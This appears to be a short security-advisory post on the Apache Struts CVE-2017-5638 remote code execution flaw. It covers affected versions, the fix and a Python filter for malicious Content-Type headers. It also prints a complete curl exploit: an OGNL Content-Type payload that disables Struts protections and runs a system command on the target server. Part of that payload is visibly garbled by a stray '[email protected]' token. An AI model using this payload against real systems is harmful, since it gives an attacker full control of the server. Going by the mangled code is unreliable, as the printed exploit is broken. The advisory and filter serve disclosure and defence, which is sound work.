Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The exploit is triggered by a malformed `Content-Type` HTTP header. An attacker can craft a header containing an OGNL expression. The flawed error handling mechanism within the file upload logic incorrectly interprets this malicious header. Instead of treating it as a simple string, the parser executes the embedded OGNL expression. This occurs because the exception handler passes the improperly parsed header value directly into an OGNL execution call. Consequently, the attacker achieves remote code execution with the same privileges as the Struts application server, allowing them to run arbitrary system commands, exfiltrate data, or gain complete control over the affected system.

DailyCVE Form:

Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07

Prediction: Patch Available

What Undercode Says:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-showcase/fileupload/doUpload.action

How the Exploit Works:

A malicious Content-Type header containing an OGNL expression is sent. The parser’s error handling evaluates the expression, and arbitrary commands run on the server.

Protection from this CVE:

Apply the official patch: upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers.
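As an added example (not from the original post and not Apache Struts code), the check a WAF rule or servlet filter would apply to the Content-Type value, written in Python. It also shows why a plain substring match on "multipart/form-data", which is what routes a request to the multipart parser, is not a safe acceptance test on its own; the sample headers are constructed.

```python
import re

# Tokens that open an OGNL expression; none of them can appear in a
# syntactically valid Content-Type value.
OGNL_MARKERS = ("%{", "${")

# Strict grammar for a multipart upload header: media type, optional charset,
# and a boundary made of the characters RFC 2046 allows (at most 70 of them).
MULTIPART_RE = re.compile(
    r"^multipart/form-data"
    r"(?:\s*;\s*charset=[\w-]+)?"
    r"\s*;\s*boundary=\"?([0-9A-Za-z'()+_,\-./:=? ]{1,70})\"?\s*$",
    re.IGNORECASE,
)

def naive_is_multipart(value: str) -> bool:
    """The routing test the vulnerable path relies on: a substring match."""
    return "multipart/form-data" in value.lower()

def classify_content_type(value: str) -> str:
    """'multipart' for a well-formed upload header, 'ognl' when an expression
    opener is present, 'other' for anything else."""
    if any(marker in value for marker in OGNL_MARKERS):
        return "ognl"
    if MULTIPART_RE.match(value):
        return "multipart"
    return "other"

def should_block(value: str) -> bool:
    """Filter decision: drop the request if the header would be routed to the
    multipart parser but is not a well-formed multipart header."""
    return naive_is_multipart(value) and classify_content_type(value) != "multipart"

# Constructed sample header values (not captured traffic). The 'ognl' entry
# only carries the expression opener and an assignment; the substring
# 'multipart/form-data' inside it is what satisfies the naive routing test.
SAMPLES = {
    "benign": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "json": "application/json",
    "ognl": "%{(#_='multipart/form-data').(#x=1)}",
    "garbage": "multipart/form-data; boundary=",
}

if __name__ == "__main__":
    for name, hdr in SAMPLES.items():
        print(f"{name:8} routed={naive_is_multipart(hdr)} "
              f"class={classify_content_type(hdr)} block={should_block(hdr)}")
```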

Impact:

Full system compromise. Unauthorized data access. Complete server control.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
